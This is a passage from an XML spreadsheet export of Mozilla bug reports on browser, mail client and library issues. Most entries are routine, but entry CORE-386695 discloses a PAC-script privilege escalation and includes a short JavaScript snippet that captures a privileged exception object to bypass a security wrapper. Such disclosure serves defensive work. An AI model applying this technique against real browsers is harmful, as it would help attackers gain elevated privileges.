    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 de rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4
PR_Write emulates the O_APPEND flag by seeking to EOF upon each write when in append mode.
compare:
http://lxr.mozilla.org/seamonkey/source/nsprpub/pr/src/io/prfile.c#103
This is fine but PR_Seek instead of PR_Seek64 is used so that this fails one we pass the 4GB border.
I think this at least affects TB (no folders &gt;4GB) as well as the downTHEMAll extension (found this hacking the latter).
Reproducible: Always
Steps to Reproduce:
1. Open an nsIFileOutputStream and write more than 4GB data. (Not at once)
2. See it throw once 4GB mark is reached.</t>
  </si>
  <si>
    <t>TOOLKIT-462047</t>
  </si>
  <si>
    <t>nsPlacesDBFlush.js should have an error handler</t>
  </si>
  <si>
    <t>Right now we do not know about errors from async statement execution.  We need to fix that...</t>
  </si>
  <si>
    <t>BUGZILLA-190589</t>
  </si>
  <si>
    <t>sidebar.cgi should link to report.cgi instead of reports.cgi for consistency</t>
  </si>
  <si>
    <t>useful-links.html.tmpl and index.html.tmpl both link to
 report.cgi  (e.g. http://bugzilla.mozilla.org/report.cgi)
and sidebar.cgi links to:
 reports.cgi (e.g. http://bugzilla.mozilla.org/reports.cgi)
This should be consistent and since one can go from report to reports and
report offers other niceties (charts etc.) we should use report.cgi.</t>
  </si>
  <si>
    <t>CORE-269908</t>
  </si>
  <si>
    <t xml:space="preserve"> default style changes restrict styling options</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a5) Gecko/20041112
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a5) Gecko/20041114 Firefox/0.9.1+
Can you please remove  ! important from the float property of  in the
resource://gre/res/forms.css file (addition shown in
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&amp;whitespace_mode=show&amp;root=/cvsroot&amp;subdir=mozilla/layout/html/document/src&amp;command=DIFF_FRAMESET&amp;file=forms.css&amp;rev2=3.92&amp;rev1=3.91
)?
From what I have heard float wasn't causing the problems in the first place and
it is the only way in which designers can break  out of its rigid position.
The addition of these two line from what I have heard and read came as a
result of a bug[5] in the rendering engine surrounding an instance when
's position was set to absolute or fixed. While I can see how
restricting position to static fixes this bug I do not see the need to restrict
float as well. If float was left unrestricted it would mean that you could
manipulate it in the method which I currently practice. All that it would take
to allow for this is the removal of  ! important from
resource://gre/res/forms.css a total of 12 characters/96 bytes[1].
Opera Internet Explorer Safari and Konqueror all support this method. Gecko
did as well until this recent change.
I can see no perceivable downside in making this change to the stability of the
rendering engine only the benefits of the extra styling. I checked to see
whether the browser (Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.8a5)
Gecko/20041114 Firefox/0.9.1+) crashed hung or malfunctioned in any way when
floating is allowed. The browser worked fine when the  had float: left
applied. I disabled the override by editing line 62 of
resource://gre/res/forms.css (found in C:\Program Files\mozilla.org\Mozilla
Firefox Nightly\res\forms.css on my Windows installation) from float: none !
important to float: none/* ! important*/.
Having such a restricted layout of this element not only limits the extend to
which developers can manipulate it to suit their needs but also might lead to
developers avoiding it due to this issue thus leading to a loss in semantic
value of the page which I doubt anyone would like to see for the greater good
of the web.
We should be encouraging people to use this very useful element - its benefits
extend to accessibility and semantics - making the web technologically better.
By enforcing such a strict layout you surely are impeding and limiting its uses
as some might forsake the benefits it provides for the aesthetic appearance of
their site (however I would not personally).
It has been said this element and its parent  are form controls. I
strongly disagree with this notion. They allow for form controls to be separated
and distinguished just like . They are not form controls themselves as
a form control has a state and can be submitted to the server. Also it is not
defined where it should go or how it should look so the author should be able to
use CSS to style it to suit [2].
Also brought up was this issue of styling and the inability to render a
 and  in their current way with CSS. The ability to be styled
using CSS I believe would benefit the push for flexibility of this combination.
Although my primary aim is to see the restriction of float lifted in the long
run it would probably be better if the bugs associated with certain styles and
 were sorted out as well as the ability to completely unlock it from
it's locked state using CSS (which would be easier to implement if the current
rendition of  and  was able to be done in CSS).
Your consideration on this matter is appreciated.
   1. Whilst the removal of the leading space isn't a requirement to let this
change take place for tidiness sake it would be best removed.
   2. Thank you to red_one in irc://irc.freenode.org/#web for his thoughts on
this matter and CloCkWeRX for his time.
   3. Also thank you to bz Callek fantasai and any other members of
irc://irc.mozilla.org/#developers for assistance and time regarding this matter.
   4. Please note: I am not complaing to you as to the short falls of CSS
merely asking you to remove the float restriction on . Any comments
regarding CSS's lack of ability in any area is just provided for information
purposes.
   5. https://bugzilla.mozilla.org/show_bug.cgi?id=263406
Reproducible: Always
Steps to Reproduce:
Float a 
legend{float:left}
bob
Actual Results:  
In the recent nightlies: no change.
Expected Results:  
The legend should have dropped below breaking out of the 's normal
rendering as it did before (
http://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&amp;whitespace_mode=show&amp;root=/cvsroot&amp;subdir=mozilla/layout/html/document/src&amp;command=DIFF_FRAMESET&amp;file=forms.css&amp;rev2=3.92&amp;rev1=3.91
).
For an online demostration and markup version of this bug and report please see
http://bugs.ocoth.id.au/mozilla/2/ .</t>
  </si>
  <si>
    <t>FIREFOX-429447</t>
  </si>
  <si>
    <t>[meta] Icon organization</t>
  </si>
  <si>
    <t>This is a tracking bug for organizeing the names and locations of Firefox's icons.  For Firefox 3 we will likely just start with removing icons that are no longer in use.</t>
  </si>
  <si>
    <t>MOZILLA_MESSAGING-521250</t>
  </si>
  <si>
    <t>password protect stage</t>
  </si>
  <si>
    <t>can we set up a password protect for stage 
we are stating to get spam 
i cleaned it up yesterday</t>
  </si>
  <si>
    <t>graphicsguru</t>
  </si>
  <si>
    <t>CORE-304847</t>
  </si>
  <si>
    <t>[FIX]nsSecurityBrowserUIImpl shouldn't GetName when it doesn't need to</t>
  </si>
  <si>
    <t>It only uses the name for NSPR logging so it shouldn't get it when logging is
not happening -- getting the name is expensive.</t>
  </si>
  <si>
    <t>FIREFOX-346314</t>
  </si>
  <si>
    <t>when dragging to reorder a tab scrolling stops when you attempt to scroll over the selected tab</t>
  </si>
  <si>
    <t>when dragging to reorder a tab scrolling stops in certain scenario
here's my scenario:
1)  set the min tab width pref to a large value to make this easier to reproduce.
2)  open many tabs
3)  select one in the middle and drag it to the left
4)  drag until scrolling start
5)  stop dragging when the original tab is cut off half way
6)  without letting go of the tab attempt to drag back to the right
actual results:
you can't drag the tab to the right (and I get the no drop cursor)
desired result
you are able to drag the tab to the right
I fear this might be related to the hide the arrow when dragging on/under the active tab of bug #333791
I'm going to revert the change to can drop to confirm this is the cause of the regression.</t>
  </si>
  <si>
    <t>CORE-204161</t>
  </si>
  <si>
    <t>zh-HK language group</t>
  </si>
  <si>
    <t>Currently zh-HK belongs to zh-TW language group. But should we
prepare zh-HK language group alone? There are some problems
around rendering. e.g. bug 152264.</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-219784</t>
  </si>
  <si>
    <t>funimation.com - serving WMV files as text/plain</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5b) Gecko/20030917 Firebird/0.6.1+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.5b) Gecko/20030917 Firebird/0.6.1+
when i am attempting to view .wmv files from various web pages all that I will
end up seeing is various garbled letters.  I have attempted uninstalling
Windows media player and reinstalling it hoping that the plug-ins would work
correctly.  Please help.
Reproducible: Always
Steps to Reproduce:
1.go to a web page 
2.click on .wmv clip I would like to view
3.
Actual Results:  
another web page opens up and all that I see is garbbled letters and symbols.
Expected Results:  
It should have opened Windows Media Player and showed the .wmv file.</t>
  </si>
  <si>
    <t>chris1561</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-242053</t>
  </si>
  <si>
    <t>clark.edu - HTML page served as text/plain</t>
  </si>
  <si>
    <t>This reference page for one of my classes has no extension on the filename so
the school server defaults to serving it as text/plain.
Dropped a note to my teacher asking her to add an .html to match her other pages
so that I see the web page not the source code.</t>
  </si>
  <si>
    <t>CORE-21461</t>
  </si>
  <si>
    <t>Mozilla doesn't show background colour of outer of two nested tables</t>
  </si>
  <si>
    <t>The tables in the right part of the web page is not shown correctly.</t>
  </si>
  <si>
    <t>norwolf</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-282867</t>
  </si>
  <si>
    <t>GFX: Win32</t>
  </si>
  <si>
    <t>Should call ::GdiFlush before trying to read from a DIB section's memory</t>
  </si>
  <si>
    <t>Because of the GDI batch limit it is possible for GDI writes to a DIB section to
have been uncompleted before you attempt to read the memory directly. I have
examined the win32 code and determined three locations where it appears that a
DIB section's memory might be read and therefore GDI ought to be flushed first.
1. nsDrawingSurfaceWin::Lock might return the memory for mSelectedBitmap
2. nsImageWin::DrawComposited reads screenBits after setting them with BitBlt
3. nsImageWin::DrawTile reads screenBits after setting them with SretchBlt
Note that there is no issue with writing to a DIB section before calling a GDI
function or passing DIB section raw memory buffers to GDI functions.</t>
  </si>
  <si>
    <t>CORE_GRAVEYARD-298430</t>
  </si>
  <si>
    <t>drop support for Mac OS X 10.1 (Puma)</t>
  </si>
  <si>
    <t>All Mozilla.org products should drop support for Mac OS X 10.1.x (simply 10.1
from here on) ASAP for the following reasons:
1) we do not have adequate QA for Mac OS X 10.1 and cannot ensure a quality
product - this includes Firefox 1.1
2) 10.1 has a very immature API - we can use more complete and advanced APIs
that are not available on 10.1 once support for it is dropped
3) Mac developers are stretched thin at the moment and expending effort on 10.1
compatibility would be silly at this point
4) the number of users on 10.1 is minimal and most people who would be using a
web browser a lot would have upgraded to another OS version or would not be
using Firefox
5) things are going to get much worse concerning 10.1 when we try to use cocoa
widgets and quartz
6) once support for 10.1 is dropped our code can be optimized further by
removing 10.1 workarounds
This bug should remain open until 10.1 support is dropped as I will be making
notes for things we can do once that happens (code we can remove optimizations
new APIs that get freed up bugs we can close).</t>
  </si>
  <si>
    <t>CORE-133808</t>
  </si>
  <si>
    <t>Animated GIFs start animating in print preview after orientation change to landscape on frames pages</t>
  </si>
  <si>
    <t>When a page with frames and animated GIFs is loaded into Print Preview in
landscape mode (or orientation is changed from portrait to landscape mode) the
animated GIFs begin to animate.</t>
  </si>
  <si>
    <t>CORE-486946</t>
  </si>
  <si>
    <t>Allocator mismatch in nsPluginsDirWin.cpp</t>
  </si>
  <si>
    <t>GetVersion uses PR_smprintf but FreePluginInfo uses PL_strfree.</t>
  </si>
  <si>
    <t>TOOLKIT-257992</t>
  </si>
  <si>
    <t>Cannot install multiple themes using drag-and-drop to the EM window</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.0 en-US rv:1.7) Gecko/20040803 Firefox/0.9.3
Hi All
   I install and maintain a lot of Firefox for my customer base.  I carry
multiple extensions and themes with me on a CDROM disk.  
   Currently I have to drag them one at a time into themes and/or extensions
to install them.  If I select multiple files and themes and drag them into
Firefox none of the themes/extension will install correctly. 
    Would you consider fixing this for me?
Many thanks
--Tony
aewell@gbis.com
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>JSS-120784</t>
  </si>
  <si>
    <t>SSLServerSocket  does not throw java.io.InterruptedIOException</t>
  </si>
  <si>
    <t>The accept() method in SSLServerSocket should throw the
java.io.InterruptedIOException if the timeout expires instead of
SocketException.</t>
  </si>
  <si>
    <t>patrick.o.cesard</t>
  </si>
  <si>
    <t>CORE-223577</t>
  </si>
  <si>
    <t>fold nkcache REQUIRES into necko</t>
  </si>
  <si>
    <t>it's pretty silly to have a separate include directory for the cache header
files.  we should just put them in necko ... this will help eliminate an extra
REQUIRES entry when working with necko.</t>
  </si>
  <si>
    <t>CORE-138069</t>
  </si>
  <si>
    <t>-moz-user-focus elements have no tab interface or means of setting focus</t>
  </si>
  <si>
    <t>An xhtml element in an xhtml document having CSS3 style -moz-user-focus can 
recive the focus with a mouse click. Unfortunately there is no tab controller 
as in XUL so you can not tab beteeen elements. Also the xhtml interface does not 
support a focus() method so it is not possible to write one. 
If I invert the document so that the xhtml is inside an xul:description element 
and have the input elements in the xul namespace the tabbing and focus control 
return (as you would expect). Unfortunately you then loose other things like 
page scrolling and mousewheel support.</t>
  </si>
  <si>
    <t>pwilson</t>
  </si>
  <si>
    <t>CORE-211275</t>
  </si>
  <si>
    <t>GetAtomHashEntry doesn't check the return value of PL_DHashTableInit</t>
  </si>
  <si>
    <t>This is a code inspection bug.
QA:
To verify that this bug is fixed make sure that all callers in of 
PL_DHashTableInit in the indicated class/file check and handle a failure return 
result.
To verify that this bug is invalid simply verify (e.g. with lxr) that 
PL_DHashTableInit is no longer used by the indicated class/file.
PL_DHashTableInit returns a PRBool indicating whether it succeeded. 
PL_DHashTableInit *can* fail. Code can not assume that table-&gt;ops or table-
&gt;data will be null (in fact it probably will not be) although in all 
likelyhood table-&gt;entryStore will be null it probably isn't safe to assume this.
Code at time of bug filing:
 482 static AtomTableEntry* GetAtomHashEntry(const char* aString)
 483 {
 484   if ( !gAtomTable.entryCount )
 485     PL_DHashTableInit(&amp;gAtomTable &amp;AtomTableOps 0
 486                       sizeof(AtomTableEntry) 2048)</t>
  </si>
  <si>
    <t>TOOLKIT-399815</t>
  </si>
  <si>
    <t>Store autoResume in moz_downloads table to indicate if a download should auto-resume</t>
  </si>
  <si>
    <t>Created attachment 284880
v1
We can use this value to determine if we should auto-resume downloads when quitting the app.
.. no testcase yet.. :p</t>
  </si>
  <si>
    <t>THUNDERBIRD-269593</t>
  </si>
  <si>
    <t>Folder Properties dialog does not support rename folder</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.7.5) Gecko/20041107 Firefox/1.0
In Thunderbird 0.9 (20041103)I am no longer able to rename mail folders that I
have created.  I believe I was able to do this in prior releases.  If I slow
doubleclick the folder name the name highlights but never becomes editable. 
If instead I right click the name select Properties and then try to edit the
name in the Properties dialog again the name is not editable.  Initially the
name is highlighted but it can't be changed.
I tried installing a new version of Thunderbird 0.9 from scratch using a new
profile and using the default profile contents/settings.  The problem remained.
Reproducible: Always
Steps to Reproduce:
1.Create a new folder e.g. ABC.
2.Right click the ABC folder.
3.Select Properties.
4.Try to change the folder name to DEF.
Actual Results:  
The folder name is highlighted in the Properties dialog but cannot be changed.
Expected Results:  
The name in the Properties dialog (or a slow-doubleclicked name) should be
changeable.</t>
  </si>
  <si>
    <t>jknauth</t>
  </si>
  <si>
    <t>CORE-581499</t>
  </si>
  <si>
    <t>CR and LF characters in a textarea field shouldn't trigger JIS x 4051 line breaking</t>
  </si>
  <si>
    <t>I _think_ this patch should be safe.  Without this with bug 240933 every textarea containing multiple lines would be subject to the JIS x 4051 line breaking algorithm.</t>
  </si>
  <si>
    <t>CORE-386695</t>
  </si>
  <si>
    <t>PAC privilege escalation using exception objects came from outside of sandbox</t>
  </si>
  <si>
    <t>When FindProxyForURL() is being called exception objects are created in a
context that is trying to load a url.
function FindProxyForURL(url host) {
  try { new XPCNativeWrapper() } // or Components.lookupMethod() etc.
  catch (e) { x = e }
}
x is an exception object came from a web page chrome (browser.xul) or the
safe context (hidden window).
An object that has the system principal or the hidden window's principal can be
used to defeat the XPCSafeJSObjectWrapper in proxyAlert() and dnsResolve(). 
(Actual exploit code relies on other security bugs.)</t>
  </si>
  <si>
    <t>FIREFOX-958447</t>
  </si>
  <si>
    <t>Client support for tokenserver backoff protocol</t>
  </si>
  <si>
    <t>Per Bug 697126 the tokenserver may issue 200+X-Backoff and/or 503+Retry-After responses clients should be prepared to handle them as gracefully as possible.</t>
  </si>
  <si>
    <t>rfkelly</t>
  </si>
  <si>
    <t>NSS-69582</t>
  </si>
  <si>
    <t>when /tmp is 100% full certutil goes into an endless loop</t>
  </si>
  <si>
    <t>at least I assume it is an endless loop terminated by a core dump.
On the weekend hbombaix /tmp was filled 100% when QA started the output.log was
slightly above 1 GB.
I attach the first 200 lines and the core file</t>
  </si>
  <si>
    <t>BUGZILLA.MOZILLA.ORG-423725</t>
  </si>
  <si>
    <t>consolidation of bugzilla accounts</t>
  </si>
  <si>
    <t>over the years as I have had various roles in Mozilla I have accumulated several bugzilla accounts: lars@mozilla.com twobraids@gmail.com larslohn01@gmail.com lohnk@osuosl.org (defunct?).  I wish to merge them all under lars@mozilla.com</t>
  </si>
  <si>
    <t>SEAMONKEY-323377</t>
  </si>
  <si>
    <t>Lots of leaks in nsInternetSearchService</t>
  </si>
  <si>
    <t>There's lots of nsISupportsArray misuse in this file.  In particular any line like:
  nsCOMPtr isupports = mUpdateArray-&gt;ElementAt(0)
leaks.  It should be using dont_AddRef or something.  Or better yet using do_QueryElementAt accordingly if it doesn't need the actual nsISupports pointer.  Perhaps mUpdateArray shouldn't even be an nsISupportsArray?
I have this fixed in my tree (as part of a general remove nsISupports::ElementAt kinda thing) but that can't go into the mozilla.org tree so this should be fixed for real.  Ccing some people who may be interested if none of you guys want to do it I guess I can.</t>
  </si>
  <si>
    <t>MOZILLA_LOCALIZATIONS-372430</t>
  </si>
  <si>
    <t>ru / Russian</t>
  </si>
  <si>
    <t>Improve translation of  Find again</t>
  </si>
  <si>
    <t>Someone sent me the following suggestion for the russian tbird translation:
In Find Again option of Edit menu â€œAgainâ€ is wrongly translated as â€œNextâ€ instead of Again.</t>
  </si>
  <si>
    <t>NSPR-330720</t>
  </si>
  <si>
    <t>Remove VACPP from NSPR</t>
  </si>
  <si>
    <t>This bug is to remove all VACPP references from NSPR and convert XP_OS2_EMX to XP_OS2</t>
  </si>
  <si>
    <t>INFRASTRUCTURE_&amp;_OPERATIONS_GRAVEYARD-477389</t>
  </si>
  <si>
    <t>www.mozilla.org build process broken (at least partially)</t>
  </si>
  <si>
    <t>I checked in a change to http://www.mozilla.org/hacking/notification/  as the CVS log shows: http://bonsai-www.mozilla.org/cvslog.cgi?file=mozilla-org/html/hacking/notification/index.html&amp;rev=&amp;root=/www/ - but the change is not showing up. In fact the other files I checked in at the same time are still being sent in their old versions.
Gerv</t>
  </si>
  <si>
    <t>CORE-243037</t>
  </si>
  <si>
    <t>Doesn't display page properly text part gets overlapped.(IE displays properly)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.7b) Gecko/20040421
Build Identifier: Mozilla/5.0 (Windows U Win 9x 4.90 en-US rv:1.7b) Gecko/20040421
Visit this page http://www.indiafm.com/previews/04/humtum/index.shtml  you can
observe that page isn't displayed properly the text part gets shifted to left
of the page and  Internet Explorer displays it properly.
Reproducible: Always
Steps to Reproduce:
1. visit http://www.indiafm.com/previews/04/humtum/index.shtml
2. Observe how the page is displayed
3.
Actual Results:  
Page isnt displayed properly text part gets overlapped with the other frame in
the display.
Expected Results:  
Ofcourse should display without overlapping.</t>
  </si>
  <si>
    <t>cheeku18</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-209031</t>
  </si>
  <si>
    <t>sterpolis.nl - redirection to IE</t>
  </si>
  <si>
    <t>Sterpolis is a Dutch assurances company. A non-IE user agent is redirected to a
page which says you have to have IE 4.x or higher.</t>
  </si>
  <si>
    <t>reinout</t>
  </si>
  <si>
    <t>TESTING_GRAVEYARD-586640</t>
  </si>
  <si>
    <t>Mozmill</t>
  </si>
  <si>
    <t>Timeout failure in waitForPageLoad when a page has already been loaded</t>
  </si>
  <si>
    <t>Created attachment 465227
Testcase (testHomeButton.js)
This bug was found when I was changing a test in bug 585775: [1] testPreferences/testSetToCurrentPage.js
By converting the test to use a local-file the timeout would occur after we press the Home button. The homepage is set to a local-file during the run of a test. 
[1] http://hg.mozilla.org/qa/mozmill-tests/file/8a7873bbfe8b/firefox/testPreferences/testSetToCurrentPage.js
[2] Timeout occurs on this line http://hg.mozilla.org/qa/mozmill-tests/file/8a7873bbfe8b/firefox/testPreferences/testSetToCurrentPage.js#l83
I've attached a simple version of the test. Place it in the testPreferences folder and give it a try.
The test will open a local-file. Open the preferences dialog and set that page to the current page. Open a second local-file. Click the home button. When we click the home button the test times out with the wait.</t>
  </si>
  <si>
    <t>aaron.train</t>
  </si>
  <si>
    <t>CORE-98032</t>
  </si>
  <si>
    <t>Possible optimization in nsBoxToBlockAdaptor::Reflow(...)</t>
  </si>
  <si>
    <t>The nsBoxToBlockAdaptor::Reflow(...) is computing the 'ascent' of the block (see 
the excerpt below) -- it isn't cheap.  However this information is _already_ 
available in the block code in its |mAscent| member variable. Furthermore the 
block code computes it in a correct way -- just taking the max ascent of the 
fonts isn't enough there could be an hierarchy of things like   
etc. The |mAscent| isn'it exposed. There used to be a nsBlockFrame::GetAscent() 
method but it was removed. However since nsBoxToBlockAdaptor needs the block's 
ascent maybe that function could be re-instated.
nsresult
nsBoxToBlockAdaptor::Reflow(...)
[...]
    // ok we need the max ascent of the items on the line. So to do this
    // ask the block for its line iterator. Get the max ascent.
    nsresult rv
    nsCOMPtr lines = do_QueryInterface(mFrame 
    if (NS_SUCCEEDED(rv) &amp;&amp; lines) 
    {
      nsIFrame* firstFrame = nsnull
      PRInt32 framesOnLine
      nsRect lineBounds
      PRUint32 lineFlags
      lines-&gt;GetLine(0 
      if (firstFrame) {
        nsRect rect(0000)
        firstFrame-&gt;GetRect(rect)
        const nsStyleFont* font
        firstFrame-&gt;GetStyleData(eStyleStruct_Font
                            (const nsStyleStruct*
        nsIRenderingContext
        rc.SetFont(font-&gt;mFont)
        nsIFontMetrics* fm
        rv = rc.GetFontMetrics(fm)
        if (NS_SUCCEEDED(rv) &amp;&amp; (nsnull != fm)) {
          fm-&gt;GetMaxAscent(aDesiredSize.ascent)
          NS_RELEASE(fm)
        }
        rv = NS_OK
        aDesiredSize.ascent += rect.y
      }
    }
[...]
}</t>
  </si>
  <si>
    <t>TOOLKIT-521918</t>
  </si>
  <si>
    <t>Download manager shows file as being from wyciwyg resource</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Load Gmail.
2. Load an email from Asa that links to an ogg file on mozilla.org.
3. Alt-click the link to the ogg file.
4. Wait for the download to finish.
Result: Download manager shows the file as being from wyciwyg resource.
Expected: Download manager should show it as being from mozilla.org.
Using Firefox built from d761860c50c7+ on Mac.</t>
  </si>
  <si>
    <t>BUGZILLA-524254</t>
  </si>
  <si>
    <t>The comment box in bug/edit.html.tmpl should be a block</t>
  </si>
  <si>
    <t>The only major piece of code in bug/edit.html.tmpl that's not in a BLOCK is the Additional Comments section. I've frequently wanted to have it in a block during customizations and I've now run into an upstream situation where it would be much easier to refactor the file if that code were in a block so I'm breaking this off into its own bug and just doing it.</t>
  </si>
  <si>
    <t>CORE-160188</t>
  </si>
  <si>
    <t>Report MozillaUIWindowClass for XUL windows instead of MozillaWindowClass</t>
  </si>
  <si>
    <t>Screen readers and other assistive technologies listen for focus events and
then use the window class to drill down and find what they're looking for.
Right now a screen reader has no good way to find the first content window -
they have much different behavior in content then UI and they need to
initialize differently for these different types of windows. For content they
have to load the entire accessible tree.
I would like to make XUL windows use MozillaUIWindowClass instead of
MozillaWindowClass so that they can tell the difference at this level.
The question is will this break anything?</t>
  </si>
  <si>
    <t>NSS-557071</t>
  </si>
  <si>
    <t>chains.sh test script failing because of expired test cert</t>
  </si>
  <si>
    <t>This seems to be a yearly comeback of bug 491163 where PayPalEE.cert is expired.</t>
  </si>
  <si>
    <t>SOCORRO-419565</t>
  </si>
  <si>
    <t>reporter crashes with this dump.</t>
  </si>
  <si>
    <t>Looking at the report for uuid ccec8854-e33c-11dc-99f0-001a4bd43ef6 gives a 500 error.
The log from the reporter is at http://people.mozilla.com/~aravind/report.txt</t>
  </si>
  <si>
    <t>WEBSITES-448124</t>
  </si>
  <si>
    <t>Please add my feed to Planet</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Build Identifier: 
Hi guys could you please add my Mozilla feed to PMO? I'm the new AMO Community Mobilizer for Mozilla.
http://www.reybango.com/index.cfm/Mozilla
Thanks.
Reproducible: Always
Steps to Reproduce:
1.
2.
3.</t>
  </si>
  <si>
    <t>rbango</t>
  </si>
  <si>
    <t>ADDONS.MOZILLA.ORG_GRAVEYARD-453688</t>
  </si>
  <si>
    <t>Change zh-TW recommended list</t>
  </si>
  <si>
    <t>In bug 377631 comment 36 Tim mentions moztw.org has a community recommended list [1] they'd like to use as their recommended list on AMO.
[1] http://www.moztw.org/firefox/extension_top_15/</t>
  </si>
  <si>
    <t>CORE-84774</t>
  </si>
  <si>
    <t>Bugzilla page gets infinite throbber again</t>
  </si>
  <si>
    <t>6/7 13 branch win32
I'm seeing the infinite throbber on bugzilla bug reports again with this build.
 Don't know if it's all the time didn't have time to test before filing this.</t>
  </si>
  <si>
    <t>selmer</t>
  </si>
  <si>
    <t>WEBSITES-339190</t>
  </si>
  <si>
    <t>[wiki] Remove spam and maybe add to blacklist</t>
  </si>
  <si>
    <t>This (small amount of) Spam has been on wikimo for more than 24 hours with no cleanup.  Sysops on #bmo seem to be away/asleep at the moment. (CC-ing a few sysops for this bug).
See: http://wiki.mozilla.org/index.php?title=Special:Contributions&amp;target=1148499792
For the articles he changed please see the edit view of the pages.  We should generate a ban and possibly add to our SpamBlackList for those URL's.</t>
  </si>
  <si>
    <t>THUNDERBIRD-244247</t>
  </si>
  <si>
    <t>Initial Focus in Help About</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a1) Gecko/20040520 Firefox/0.8.0+
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.8a1) Gecko/20040520 Firefox/0.8.0+
The initial Fokus in Firefox just changed to ok. Please implement this also in
Thunderbird.
Bug 216722 - Initial focus in Help|About Mozilla Firefox should be OK. Patch
by Jeff Walden  r=mconnor@myrealbox.com
Reproducible: Always
Steps to Reproduce:
1.
2.
3.
Actual Results:  
.
Expected Results:  
.</t>
  </si>
  <si>
    <t>guenter-huerkamp</t>
  </si>
  <si>
    <t>CORE-343182</t>
  </si>
  <si>
    <t>Password Manager asks multiple times to save a password</t>
  </si>
  <si>
    <t>After typing in my name+password at http://webfile.nd.edu I get prompted multiple times for whether or not I want to save my password
Steps to reproduce:
1.) Go to http://webfile.nd.edu
2.) Type in name+password
3.) Firefox prompts whether you want it to remember the password.
4.) Choose 'Not Now'.
5.) Firefox prompts you again. (x4)
I've seen this on mac-trunk.  jwalden reports reproducing it on branch-linux and trunk-linux too.</t>
  </si>
  <si>
    <t>SEAMONKEY-396105</t>
  </si>
  <si>
    <t>Hide For Internet Explorer Users menuitem (and Help content)</t>
  </si>
  <si>
    <t>We should hide the menuitem and the related help content for mac users. IE5 for mac hasn't been available for download from MS since Jan 31 2006. I also doubt that it works on Tiger (in case someone still has IE5 on their hard drive).</t>
  </si>
  <si>
    <t>CORE-496674</t>
  </si>
  <si>
    <t>TM: replace FORALL macro with template magic</t>
  </si>
  <si>
    <t>THUNDERBIRD-295347</t>
  </si>
  <si>
    <t>duplicate entry when drags &amp; drops between two Personal Address Books (PAB)</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 fr-FR rv:1.7.8) Gecko/20050511 Firefox/1.0.4
Build Identifier: Mozilla Thunderbird 1.0.2 (Windows/20050317)
When you want to create lists in an PAB with same entry coming from another PAB
or ldap directory this entry appears as many times in the PAB than lists with it.
Reproducible: Always
Steps to Reproduce:
1.Create 2 PAB (PAB1 &amp; PAB2)
2.Create an entry in PAB1 (john.doe@dummy.org)
3.Create 2 empty lists in PAB2 (L1 &amp; L2)
4.Drag &amp; drop the entry john.doe from PAB1 to PAB2/L1
5.Drag &amp; drop the entry john.doe from PAB1 to PAB2/L2
Actual Results:  
john.doe appears twice in PAB2
Expected Results:  
john.doe appears once in PAB2
This bug makes the PAB messy and makes users crazy.
In this case it's very difficult to explain them how to use efficiently the PAB. 
So this is an important bug because it creates some distrust opposite Thunderbird.
Remark: PAB is a major function in corporate area. It must work with an high
reliability before any large enterprise deployment.
Thanks.</t>
  </si>
  <si>
    <t>CALENDAR-189405</t>
  </si>
  <si>
    <t>Event repeat until date is reset to current date when editing event.</t>
  </si>
  <si>
    <t>User-Agent:       Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030112
Build Identifier: Mozilla/5.0 (Windows U Windows NT 5.1 en-US rv:1.3b) Gecko/20030112
If you set up an event to repeat until a specific date and later edit the event
for example to change the start/end time or add an exception the repeat until
date is reset to the current date.
Reproducible: Always
Steps to Reproduce:
1. Create an event
2. Set the event to occur every 1 week until some date.
3. Click o.k.
4.  Now go back and edit the event.  Without even changing a single thing click
o.k.  (or change the start/end time or add and exception it doesn't matter)
5.  Look at your calendar.  Your recurring event won't show up after the current
date.  If you go in to edit the event and check the repeat until date you will
find that it has been changed to the current date.
Actual Results:  
When you edit an event that has been set to repeat the repeat until date is
reset to the current date even if you don't actually make any changes to the event.
Expected Results:  
You should be able to edit an event as many times as you want (esp. to add
exceptions) and the repeat until date should not change unless you change it
yourself.</t>
  </si>
  <si>
    <t>the_bio_man</t>
  </si>
  <si>
    <t>TECH_EVANGELISM_GRAVEYARD-237322</t>
  </si>
  <si>
    <t>citigroup.com sends .css files as application/x-pointplus</t>
  </si>
  <si>
    <t>Warning: The stylesheet http://www.citigroup.com/citigroup/domain/_style.css 
was loaded as CSS even though its MIME type application/x-pointplus is 
